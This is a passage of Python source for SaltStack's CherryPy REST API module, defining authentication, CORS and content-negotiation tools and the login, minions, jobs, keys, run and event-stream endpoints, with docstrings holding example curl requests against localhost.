.. |req_accept| replace:: the desired response format.
.. |req_ct| replace:: the format of the request body.
.. |res_ct| replace:: the format of the response body; depends on the
:mailheader:`Accept` request header.
.. |200| replace:: success
.. |401| replace:: authentication required
.. |406| replace:: requested Content-Type not available
'''
# We need a custom pylintrc here...
# pylint: disable=W0212,E1101,C0103,R0201,W0221,W0613
# Import Python libs
from __future__ import absolute_import
import collections
import itertools
import functools
import logging
import json
import StringIO
import tarfile
import time
from multiprocessing import Process, Pipe
# Import third-party libs
# pylint: disable=import-error
import cherrypy
from cherrypy.lib import cpstats
import yaml
import salt.ext.six as six
# pylint: enable=import-error
# Import Salt libs
import salt
import salt.auth
import salt.utils.event
# Import salt-api libs
import salt.netapi
logger = logging.getLogger(__name__)
# Imports related to websocket
try:
from .tools import websockets
from . import event_processor
HAS_WEBSOCKETS = True
except ImportError:
websockets = type('websockets', (object,), {
'SynchronizingWebsocket': None,
})
HAS_WEBSOCKETS = False
def html_override_tool():
'''
Bypass the normal handler and serve HTML for all URLs
The ``app_path`` setting must be non-empty and the request must ask for
``text/html`` in the ``Accept`` header.
'''
apiopts = cherrypy.config['apiopts']
request = cherrypy.request
url_blacklist = (
apiopts.get('app_path', '/app'),
apiopts.get('static_path', '/static'),
)
if 'app' not in cherrypy.config['apiopts']:
return
if request.path_info.startswith(url_blacklist):
return
if request.headers.get('Accept') == '*/*':
return
try:
wants_html = cherrypy.lib.cptools.accept('text/html')
except cherrypy.HTTPError:
return
else:
if wants_html != 'text/html':
return
raise cherrypy.InternalRedirect(apiopts.get('app_path', '/app'))
def salt_token_tool():
'''
If the custom authentication header is supplied, put it in the cookie dict
so the rest of the session-based auth works as intended
'''
x_auth = cherrypy.request.headers.get('X-Auth-Token', None)
# X-Auth-Token header trumps session cookie
if x_auth:
cherrypy.request.cookie['session_id'] = x_auth
def salt_api_acl_tool(username, request):
'''
..versionadded:: Boron
Verifies user requests against the API whitelist. (User/IP pair)
in order to provide whitelisting for the API similar to the
master, but over the API.
..code-block:: yaml
rest_cherrypy:
api_acl:
users:
'*':
- 1.1.1.1
- 1.1.1.2
foo:
- 8.8.4.4
bar:
- '*'
:param username: Username to check against the API.
:type username: str
:param request: Cherrypy request to check against the API.
:type request: cherrypy.request
'''
failure_str = ("[api_acl] Authentication failed for "
"user {0} from IP {1}")
success_str = ("[api_acl] Authentication sucessful for "
"user {0} from IP {1}")
pass_str = ("[api_acl] Authentication not checked for "
"user {0} from IP {1}")
acl = None
# Salt Configuration
salt_config = cherrypy.config.get('saltopts', None)
if salt_config:
# Cherrypy Config.
cherrypy_conf = salt_config.get('rest_cherrypy', None)
if cherrypy_conf:
# ACL Config.
acl = cherrypy_conf.get('api_acl', None)
ip = request.remote.ip
if acl:
users = acl.get('users', {})
if users:
if username in users:
if ip in users[username] or '*' in users[username]:
logger.info(success_str.format(username, ip))
return True
else:
logger.info(failure_str.format(username, ip))
return False
elif username not in users and '*' in users:
if ip in users['*'] or '*' in users['*']:
logger.info(success_str.format(username, ip))
return True
else:
logger.info(failure_str.format(username, ip))
return False
else:
logger.info(failure_str.format(username, ip))
return False
else:
logger.info(pass_str.format(username, ip))
return True
def salt_ip_verify_tool():
'''
If there is a list of restricted IPs, verify current
client is coming from one of those IPs.
'''
# This is overly cumbersome and crude,
# But, it's also safe... ish...
salt_config = cherrypy.config.get('saltopts', None)
if salt_config:
cherrypy_conf = salt_config.get('rest_cherrypy', None)
if cherrypy_conf:
auth_ip_list = cherrypy_conf.get('authorized_ips', None)
if auth_ip_list:
logger.debug("Found IP list: {0}".format(auth_ip_list))
rem_ip = cherrypy.request.headers.get('Remote-Addr', None)
logger.debug("Request from IP: {0}".format(rem_ip))
if rem_ip not in auth_ip_list:
logger.error("Blocked IP: {0}".format(rem_ip))
cherrypy.response.status = 403
return {
'status': cherrypy.response.status,
'return': "Bad IP",
}
def salt_auth_tool():
'''
Redirect all unauthenticated requests to the login page
'''
# Redirect to the login page if the session hasn't been authed
if 'token' not in cherrypy.session: # pylint: disable=W8601
raise cherrypy.HTTPError(401)
# Session is authenticated; inform caches
cherrypy.response.headers['Cache-Control'] = 'private'
def cors_handler(*args, **kwargs):
'''
Check a CORS preflight request and return a valid response
'''
req_head = cherrypy.request.headers
resp_head = cherrypy.response.headers
ac_method = req_head.get('Access-Control-Request-Method', None)
allowed_methods = ['GET', 'POST']
allowed_headers = ['X-Auth-Token', 'Content-Type']
if ac_method and ac_method in allowed_methods:
resp_head['Access-Control-Allow-Methods'] = ', '.join(allowed_methods)
resp_head['Access-Control-Allow-Headers'] = ', '.join(allowed_headers)
resp_head['Connection'] = 'keep-alive'
resp_head['Access-Control-Max-Age'] = '1400'
return {}
def cors_tool():
'''
Handle both simple and complex CORS requests
Add CORS headers to each response. If the request is a CORS preflight
request swap out the default handler with a simple, single-purpose handler
that verifies the request and provides a valid CORS response.
'''
req_head = cherrypy.request.headers
resp_head = cherrypy.response.headers
# Always set response headers necessary for 'simple' CORS.
resp_head['Access-Control-Allow-Origin'] = req_head.get('Origin', '*')
resp_head['Access-Control-Expose-Headers'] = 'GET, POST'
resp_head['Access-Control-Allow-Credentials'] = 'true'
# If this is a non-simple CORS preflight request swap out the handler.
if cherrypy.request.method == 'OPTIONS':
cherrypy.serving.request.handler = cors_handler
# Be conservative in what you send
# Maps Content-Type to serialization functions; this is a tuple of tuples to
# preserve order of preference.
ct_out_map = (
('application/json', json.dumps),
('application/x-yaml', functools.partial(
yaml.safe_dump, default_flow_style=False)),
)
def hypermedia_handler(*args, **kwargs):
'''
Determine the best output format based on the Accept header, execute the
regular handler, and transform the output to the request content type (even
if it's an error).
:param args: Pass args through to the main handler
:param kwargs: Pass kwargs through to the main handler
'''
# Execute the real handler. Handle or pass-through any errors we know how
# to handle (auth & HTTP errors). Reformat any errors we don't know how to
# handle as a data structure.
try:
cherrypy.response.processors = dict(ct_out_map)
ret = cherrypy.serving.request._hypermedia_inner_handler(*args, **kwargs)
except (salt.exceptions.EauthAuthenticationError,
salt.exceptions.TokenAuthenticationError):
raise cherrypy.HTTPError(401)
except (salt.exceptions.SaltDaemonNotRunning,
salt.exceptions.SaltReqTimeoutError) as exc:
raise cherrypy.HTTPError(503, exc.strerror)
except cherrypy.CherryPyException:
raise
except Exception as exc:
import traceback
logger.debug("Error while processing request for: %s",
cherrypy.request.path_info,
exc_info=True)
cherrypy.response.status = 500
ret = {
'status': cherrypy.response.status,
'return': '{0}'.format(traceback.format_exc(exc))
if cherrypy.config['debug']
else "An unexpected error occurred"}
# Raises 406 if requested content-type is not supported
best = cherrypy.lib.cptools.accept([i for (i, _) in ct_out_map])
# Transform the output from the handler into the requested output format
cherrypy.response.headers['Content-Type'] = best
out = cherrypy.response.processors[best]
return out(ret)
def hypermedia_out():
'''
Determine the best handler for the requested content type
Wrap the normal handler and transform the output from that handler into the
requested content type
'''
request = cherrypy.serving.request
request._hypermedia_inner_handler = request.handler
request.handler = hypermedia_handler
@functools.wraps
def process_request_body(fn):
'''
A decorator to skip a processor function if process_request_body is False
'''
def wrapped(*args, **kwargs): # pylint: disable=C0111
if cherrypy.request.process_request_body is not False:
fn(*args, **kwargs)
return wrapped
def urlencoded_processor(entity):
'''
Accept x-www-form-urlencoded data (run through CherryPy's formatter)
and reformat it into a Low State data structure.
Since we can't easily represent complicated data structures with
key-value pairs, any more complicated requirements (e.g. compound
commands) must instead be delivered via JSON or YAML.
For example::
.. code-block:: bash
curl -si localhost:8000 -d client=local -d tgt='*' \\
-d fun='test.kwarg' -d arg='one=1' -d arg='two=2'
:param entity: raw POST data
'''
# First call out to CherryPy's default processor
cherrypy._cpreqbody.process_urlencoded(entity)
cherrypy.serving.request.unserialized_data = entity.params
cherrypy.serving.request.raw_body = ''
@process_request_body
def json_processor(entity):
'''
Unserialize raw POST data in JSON format to a Python data structure.
:param entity: raw POST data
'''
body = entity.fp.read()
try:
cherrypy.serving.request.unserialized_data = json.loads(body)
except ValueError:
raise cherrypy.HTTPError(400, 'Invalid JSON document')
cherrypy.serving.request.raw_body = body
@process_request_body
def yaml_processor(entity):
'''
Unserialize raw POST data in YAML format to a Python data structure.
:param entity: raw POST data
'''
body = entity.fp.read()
try:
cherrypy.serving.request.unserialized_data = yaml.safe_load(body)
except ValueError:
raise cherrypy.HTTPError(400, 'Invalid YAML document')
cherrypy.serving.request.raw_body = body
@process_request_body
def text_processor(entity):
'''
Attempt to unserialize plain text as JSON
Some large services still send JSON with a text/plain Content-Type. Those
services are bad and should feel bad.
:param entity: raw POST data
'''
body = entity.fp.read()
try:
cherrypy.serving.request.unserialized_data = json.loads(body)
except ValueError:
cherrypy.serving.request.unserialized_data = body
cherrypy.serving.request.raw_body = body
def hypermedia_in():
'''
Unserialize POST/PUT data of a specified Content-Type.
The following custom processors all are intended to format Low State data
and will place that data structure into the request object.
:raises HTTPError: if the request contains a Content-Type that we do not
have a processor for
'''
# Be liberal in what you accept
ct_in_map = {
'application/x-www-form-urlencoded': urlencoded_processor,
'application/json': json_processor,
'application/x-yaml': yaml_processor,
'text/yaml': yaml_processor,
'text/plain': text_processor,
}
# Do not process the body for POST requests that have specified no content
# or have not specified Content-Length
if (cherrypy.request.method.upper() == 'POST'
and cherrypy.request.headers.get('Content-Length', '0') == '0'):
cherrypy.request.process_request_body = False
cherrypy.request.unserialized_data = None
cherrypy.request.body.processors.clear()
cherrypy.request.body.default_proc = cherrypy.HTTPError(
406, 'Content type not supported')
cherrypy.request.body.processors = ct_in_map
def lowdata_fmt():
'''
Validate and format lowdata from incoming unserialized request data
This tool requires that the hypermedia_in tool has already been run.
'''
if cherrypy.request.method.upper() != 'POST':
return
data = cherrypy.request.unserialized_data
# if the data was sent as urlencoded, we need to make it a list.
# this is a very forgiving implementation as different clients set different
# headers for form encoded data (including charset or something similar)
if not isinstance(data, list):
# Make the 'arg' param a list if not already
if 'arg' in data and not isinstance(data['arg'], list):
data['arg'] = [data['arg']]
# Finally, make a Low State and put it in request
cherrypy.request.lowstate = [data]
else:
cherrypy.serving.request.lowstate = data
cherrypy.tools.html_override = cherrypy.Tool('on_start_resource',
html_override_tool, priority=53)
cherrypy.tools.salt_token = cherrypy.Tool('on_start_resource',
salt_token_tool, priority=55)
cherrypy.tools.salt_auth = cherrypy.Tool('before_request_body',
salt_auth_tool, priority=60)
cherrypy.tools.hypermedia_in = cherrypy.Tool('before_request_body',
hypermedia_in)
cherrypy.tools.cors_tool = cherrypy.Tool('before_handler',
cors_tool, priority=30)
cherrypy.tools.lowdata_fmt = cherrypy.Tool('before_handler',
lowdata_fmt, priority=40)
cherrypy.tools.hypermedia_out = cherrypy.Tool('before_handler',
hypermedia_out)
cherrypy.tools.salt_ip_verify = cherrypy.Tool('before_handler',
salt_ip_verify_tool)
###############################################################################
class LowDataAdapter(object):
'''
The primary entry point to Salt's REST API
'''
exposed = True
_cp_config = {
'tools.sessions.on': True,
'tools.sessions.timeout': 60 * 10, # 10 hours
# 'tools.autovary.on': True,
'tools.hypermedia_out.on': True,
'tools.hypermedia_in.on': True,
'tools.lowdata_fmt.on': True,
'tools.salt_ip_verify.on': True,
}
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.api = salt.netapi.NetapiClient(self.opts)
def exec_lowstate(self, client=None, token=None):
'''
Pull a Low State data structure from request and execute the low-data
chunks through Salt. The low-data chunks will be updated to include the
authorization token for the current session.
'''
lowstate = cherrypy.request.lowstate
# Release the session lock before executing any potentially
# long-running Salt commands. This allows different threads to execute
# Salt commands concurrently without blocking.
if cherrypy.request.config.get('tools.sessions.on', False):
cherrypy.session.release_lock()
# if the lowstate loaded isn't a list, lets notify the client
if not isinstance(lowstate, list):
raise cherrypy.HTTPError(400, 'Lowstates must be a list')
# Make any requested additions or modifications to each lowstate, then
# execute each one and yield the result.
for chunk in lowstate:
if token:
chunk['token'] = token
if client:
chunk['client'] = client
# Make any 'arg' params a list if not already.
# This is largely to fix a deficiency in the urlencoded format.
if 'arg' in chunk and not isinstance(chunk['arg'], list):
chunk['arg'] = [chunk['arg']]
ret = self.api.run(chunk)
# Sometimes Salt gives us a return and sometimes an iterator
if isinstance(ret, collections.Iterator):
for i in ret:
yield i
else:
yield ret
def GET(self):
'''
An explanation of the API with links of where to go next
.. http:get:: /
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000
.. code-block:: http
GET / HTTP/1.1
Host: localhost:8000
Accept: application/json
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: application/json
'''
import inspect
# Grab all available client interfaces
clients = [name for name, _ in inspect.getmembers(salt.netapi.NetapiClient,
predicate=inspect.ismethod) if not name.startswith('__')]
clients.remove('run') # run method calls client interfaces
return {
'return': "Welcome",
'clients': clients,
}
@cherrypy.tools.salt_token()
@cherrypy.tools.salt_auth()
def POST(self, **kwargs):
'''
Send one or more Salt commands in the request body
.. http:post:: /
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 401: |401|
:status 406: |406|
:term:`lowstate` data describing Salt commands must be sent in the
request body.
**Example request:**
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-H "Accept: application/x-yaml" \\
-H "X-Auth-Token: d40d1e1e<...snip...>" \\
-d client=local \\
-d tgt='*' \\
-d fun='test.ping' \\
.. code-block:: http
POST / HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
X-Auth-Token: d40d1e1e
Content-Length: 36
Content-Type: application/x-www-form-urlencoded
fun=test.ping&client=local&tgt=*
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 200
Allow: GET, HEAD, POST
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
**Other examples**:
.. code-block:: bash
# Sending multiple positional args with urlencoded:
curl -sSik https://localhost:8000 \\
-d client=local \\
-d tgt='*' \\
-d fun='cmd.run' \\
-d arg='du -sh .' \\
-d arg='/path/to/dir'
# Sending positional args and Keyword args with JSON:
echo '[
{
"client": "local",
"tgt": "*",
"fun": "cmd.run",
"arg": [
"du -sh .",
"/path/to/dir"
],
"kwarg": {
"shell": "/bin/sh",
"template": "jinja"
}
}
]' | curl -sSik https://localhost:8000 \\
-H 'Content-type: application/json' \\
-d@-
# Calling runner functions:
curl -sSik https://localhost:8000 \\
-d client=runner \\
-d fun='jobs.lookup_jid' \\
-d jid='20150129182456704682' \\
-d outputter=highstate
# Calling wheel functions:
curl -sSik https://localhost:8000 \\
-d client=wheel \\
-d fun='key.gen_accept' \\
-d id_=dave \\
-d keysize=4096
'''
return {
'return': list(self.exec_lowstate(
token=cherrypy.session.get('token')))
}
class Minions(LowDataAdapter):
'''
Convenience URLs for working with minions
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def GET(self, mid=None):
'''
A convenience URL for getting lists of minions or getting minion
details
.. http:get:: /minions/(mid)
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/minions/ms-3
.. code-block:: http
GET /minions/ms-3 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 129005
Content-Type: application/x-yaml
return:
- ms-3:
grains.items:
...
'''
cherrypy.request.lowstate = [{
'client': 'local', 'tgt': mid or '*', 'fun': 'grains.items',
}]
return {
'return': list(self.exec_lowstate(
token=cherrypy.session.get('token'))),
}
def POST(self, **kwargs):
'''
Start an execution command and immediately return the job id
.. http:post:: /minions
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 401: |401|
:status 406: |406|
:term:`lowstate` data describing Salt commands must be sent in the
request body. The ``client`` option will be set to
:py:meth:`~salt.client.LocalClient.local_async`.
**Example request:**
.. code-block:: bash
curl -sSi localhost:8000/minions \\
-H "Accept: application/x-yaml" \\
-d tgt='*' \\
-d fun='status.diskusage'
.. code-block:: http
POST /minions HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 26
Content-Type: application/x-www-form-urlencoded
tgt=*&fun=status.diskusage
**Example response:**
.. code-block:: http
HTTP/1.1 202 Accepted
Content-Length: 86
Content-Type: application/x-yaml
return:
- jid: '20130603122505459265'
minions: [ms-4, ms-3, ms-2, ms-1, ms-0]
_links:
jobs:
- href: /jobs/20130603122505459265
'''
job_data = list(self.exec_lowstate(client='local_async',
token=cherrypy.session.get('token')))
cherrypy.response.status = 202
return {
'return': job_data,
'_links': {
'jobs': [{'href': '/jobs/{0}'.format(i['jid'])}
for i in job_data if i],
},
}
class Jobs(LowDataAdapter):
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def GET(self, jid=None, timeout=''):
'''
A convenience URL for getting lists of previously run jobs or getting
the return from a single job
.. http:get:: /jobs/(jid)
List jobs or show a single job from the job cache.
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs
.. code-block:: http
GET /jobs HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
- '20121130104633606931':
Arguments:
- '3'
Function: test.fib
Start Time: 2012, Nov 30 10:46:33.606931
Target: jerry
Target-type: glob
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs/20121130104633606931
.. code-block:: http
GET /jobs/20121130104633606931 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
info:
- Arguments:
- '3'
Function: test.fib
Minions:
- jerry
Start Time: 2012, Nov 30 10:46:33.606931
Target: '*'
Target-type: glob
User: saltdev
jid: '20121130104633606931'
return:
- jerry:
- - 0
- 1
- 1
- 2
- 6.9141387939453125e-06
'''
lowstate = [{
'client': 'runner',
'fun': 'jobs.lookup_jid' if jid else 'jobs.list_jobs',
'jid': jid,
}]
if jid:
lowstate.append({
'client': 'runner',
'fun': 'jobs.list_job',
'jid': jid,
})
cherrypy.request.lowstate = lowstate
job_ret_info = list(self.exec_lowstate(
token=cherrypy.session.get('token')))
ret = {}
if jid:
job_ret, job_info = job_ret_info
ret['info'] = [job_info]
else:
job_ret = job_ret_info[0]
ret['return'] = [job_ret]
return ret
class Keys(LowDataAdapter):
'''
Convenience URLs for working with minion keys
.. versionadded:: 2014.7.0
These URLs wrap the functionality provided by the :py:mod:`key wheel
module <salt.wheel.key>` functions.
'''
def GET(self, mid=None):
'''
Show the list of minion keys or detail on a specific key
.. versionadded:: 2014.7.0
.. http:get:: /keys/(mid)
List all keys or show a specific key
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys
.. code-block:: http
GET /keys HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
local:
- master.pem
- master.pub
minions:
- jerry
minions_pre: []
minions_rejected: []
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys/jerry
.. code-block:: http
GET /keys/jerry HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
minions:
jerry: 51:93:b3:d0:9f:3a:6d:e5:28:67:c2:4b:27:d6:cd:2b
'''
self._cp_config['tools.salt_token.on'] = True
if mid:
lowstate = [{
'client': 'wheel',
'fun': 'key.finger',
'match': mid,
}]
else:
lowstate = [{
'client': 'wheel',
'fun': 'key.list_all',
}]
cherrypy.request.lowstate = lowstate
result = self.exec_lowstate(token=cherrypy.session.get('token'))
return {'return': next(result, {}).get('data', {}).get('return', {})}
def POST(self, mid, keysize=None, force=None, **kwargs):
r'''
Easily generate keys for a minion and auto-accept the new key
.. versionadded:: 2014.7.0
Example partial kickstart script to bootstrap a new minion:
.. code-block:: text
%post
mkdir -p /etc/salt/pki/minion
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
| tar -C /etc/salt/pki/minion -xf -
mkdir -p /etc/salt/minion.d
printf 'master: 10.0.0.5\nid: jerry' > /etc/salt/minion.d/id.conf
%end
.. http:post:: /keys
Generate a public and private key and return both as a tarball
Authentication credentials must be passed in the request.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
-o jerry-salt-keys.tar
.. code-block:: http
POST /keys HTTP/1.1
Host: localhost:8000
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 10240
Content-Disposition: attachment; filename="saltkeys-jerry.tar"
Content-Type: application/x-tar
jerry.pub0000644000000000000000000000070300000000000010730 0ustar 00000000000000
'''
self._cp_config['tools.hypermedia_out.on'] = False
self._cp_config['tools.sessions.on'] = False
lowstate = [{
'client': 'wheel',
'fun': 'key.gen_accept',
'id_': mid,
}]
if keysize:
lowstate[0]['keysize'] = keysize
if force:
lowstate[0]['force'] = force
lowstate[0].update(kwargs)
cherrypy.request.lowstate = lowstate
result = self.exec_lowstate()
ret = next(result, {}).get('data', {}).get('return', {})
pub_key = ret.get('pub', '')
pub_key_file = tarfile.TarInfo('minion.pub')
pub_key_file.size = len(pub_key)
priv_key = ret.get('priv', '')
priv_key_file = tarfile.TarInfo('minion.pem')
priv_key_file.size = len(priv_key)
fileobj = StringIO.StringIO()
tarball = tarfile.open(fileobj=fileobj, mode='w')
tarball.addfile(pub_key_file, StringIO.StringIO(pub_key))
tarball.addfile(priv_key_file, StringIO.StringIO(priv_key))
tarball.close()
headers = cherrypy.response.headers
headers['Content-Disposition'] = 'attachment; filename="saltkeys-{0}.tar"'.format(mid)
headers['Content-Type'] = 'application/x-tar'
headers['Content-Length'] = fileobj.len
headers['Cache-Control'] = 'no-cache'
fileobj.seek(0)
return fileobj
class Login(LowDataAdapter):
'''
Log in to receive a session token
:ref:`Authentication information <rest_cherrypy-auth>`.
'''
def __init__(self, *args, **kwargs):
super(Login, self).__init__(*args, **kwargs)
self.auth = salt.auth.Resolver(self.opts)
def GET(self):
'''
Present the login interface
.. http:get:: /login
An explanation of how to log in.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/login
.. code-block:: http
GET /login HTTP/1.1
Host: localhost:8000
Accept: text/html
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: text/html
'''
cherrypy.response.headers['WWW-Authenticate'] = 'Session'
return {
'status': cherrypy.response.status,
'return': "Please log in",
}
def POST(self, **kwargs):
'''
:ref:`Authenticate <rest_cherrypy-auth>` against Salt's eauth system
.. http:post:: /login
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:form eauth: the eauth backend configured for the user
:form username: username
:form password: password
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -si localhost:8000/login \\
-H "Accept: application/json" \\
-d username='saltuser' \\
-d password='saltpass' \\
-d eauth='pam'
.. code-block:: http
POST / HTTP/1.1
Host: localhost:8000
Content-Length: 42
Content-Type: application/x-www-form-urlencoded
Accept: application/json
username=saltuser&password=saltpass&eauth=pam
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 206
X-Auth-Token: 6d1b722e
Set-Cookie: session_id=6d1b722e; expires=Sat, 17 Nov 2012 03:23:52 GMT; Path=/
{"return": {
"token": "6d1b722e",
"start": 1363805943.776223,
"expire": 1363849143.776224,
"user": "saltuser",
"eauth": "pam",
"perms": [
"grains.*",
"status.*",
"sys.*",
"test.*"
]
}}
'''
if not self.api._is_master_running():
raise salt.exceptions.SaltDaemonNotRunning(
'Salt Master is not available.')
# the urlencoded_processor will wrap this in a list
if isinstance(cherrypy.serving.request.lowstate, list):
creds = cherrypy.serving.request.lowstate[0]
else:
creds = cherrypy.serving.request.lowstate
username = creds.get('username', None)
# Validate against the whitelist.
if not salt_api_acl_tool(username, cherrypy.request):
raise cherrypy.HTTPError(401)
# Mint token.
token = self.auth.mk_token(creds)
if 'token' not in token:
raise cherrypy.HTTPError(401,
'Could not authenticate using provided credentials')
cherrypy.response.headers['X-Auth-Token'] = cherrypy.session.id
cherrypy.session['token'] = token['token']
cherrypy.session['timeout'] = (token['expire'] - token['start']) / 60
# Grab eauth config for the current backend for the current user
try:
eauth = self.opts.get('external_auth', {}).get(token['eauth'], {})
# Get sum of '*' perms, user-specific perms, and group-specific perms
perms = eauth.get(token['name'], [])
perms.extend(eauth.get('*', []))
if 'groups' in token and token['groups'] is not False:
user_groups = set(token['groups'])
eauth_groups = set([i.rstrip('%') for i in eauth.keys() if i.endswith('%')])
for group in user_groups & eauth_groups:
perms.extend(eauth['{0}%'.format(group)])
if not perms:
raise ValueError("Eauth permission list not found.")
except (AttributeError, IndexError, KeyError, ValueError):
logger.debug("Configuration for external_auth malformed for "
"eauth '{0}', and user '{1}'."
.format(token.get('eauth'), token.get('name')), exc_info=True)
raise cherrypy.HTTPError(500,
'Configuration for external_auth could not be read.')
return {'return': [{
'token': cherrypy.session.id,
'expire': token['expire'],
'start': token['start'],
'user': token['name'],
'eauth': token['eauth'],
'perms': perms,
}]}
class Logout(LowDataAdapter):
'''
Class to remove or invalidate sessions
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
'tools.lowdata_fmt.on': False,
})
def POST(self):
'''
Destroy the currently active session and expire the session cookie
'''
cherrypy.lib.sessions.expire() # set client-side to expire
cherrypy.session.regenerate() # replace server-side with new
return {'return': "Your token has been cleared"}
class Run(LowDataAdapter):
'''
Class to run commands without normal session handling
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.sessions.on': False,
})
def POST(self, **kwargs):
'''
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>`
.. http:post:: /run
This entry point is primarily for "one-off" commands. Each request
must pass full Salt authentication credentials. Otherwise this URL
is identical to the :py:meth:`root URL (/) <LowDataAdapter.POST>`.
:term:`lowstate` data describing Salt commands must be sent in the
request body.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-d client='local' \\
-d tgt='*' \\
-d fun='test.ping' \\
-d username='saltdev' \\
-d password='saltdev' \\
-d eauth='pam'
.. code-block:: http
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
client=local&tgt=*&fun=test.ping&username=saltdev&password=saltdev&eauth=pam
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
The /run enpoint can also be used to issue commands using the salt-ssh subsystem.
When using salt-ssh, eauth credentials should not be supplied. Instad, authentication
should be handled by the SSH layer itself. The use of the salt-ssh client does not
require a salt master to be running. Instead, only a roster file must be present
in the salt configuration directory.
All SSH client requests are synchronous.
** Example SSH client request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-d client='ssh' \\
-d tgt='*' \\
-d fun='test.ping'
.. code-block:: http
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
client=ssh&tgt=*&fun=test.ping
**Example SSH response:**
.. code-block:: http
return:
- silver:
fun: test.ping
fun_args: []
id: silver
jid: '20141203103525666185'
retcode: 0
return: true
success: true
'''
return {
'return': list(self.exec_lowstate()),
}
class Events(object):
'''
Expose the Salt event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure.
.. seealso:: :ref:`events`
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'response.stream': True,
'tools.encode.encoding': 'utf-8',
# Auth handled manually below
'tools.salt_token.on': True,
'tools.salt_auth.on': False,
'tools.hypermedia_in.on': False,
'tools.hypermedia_out.on': False,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.resolver = salt.auth.Resolver(self.opts)
def _is_valid_token(self, auth_token):
'''
Check if this is a valid salt-api token or valid Salt token
salt-api tokens are regular session tokens that tie back to a real Salt
token. Salt tokens are tokens generated by Salt's eauth system.
:return bool: True if valid, False if not valid.
'''
if auth_token is None:
return False
# First check if the given token is in our session table; if so it's a
# salt-api token and we need to get the Salt token from there.
orig_sesion, _ = cherrypy.session.cache.get(auth_token, ({}, None))
# If it's not in the session table, assume it's a regular Salt token.
salt_token = orig_sesion.get('token', auth_token)
# The eauth system does not currently support perms for the event
# stream, so we're just checking if the token exists not if the token
# allows access.
if salt_token and self.resolver.get_token(salt_token):
return True
return False
def GET(self, token=None, salt_token=None):
r'''
An HTTP stream of the Salt master event bus
This stream is formatted per the Server Sent Events (SSE) spec. Each
event is formatted as JSON.
.. http:get:: /events
:status 200: |200|
:status 401: |401|
:status 406: |406|
:query token: **optional** parameter containing the token
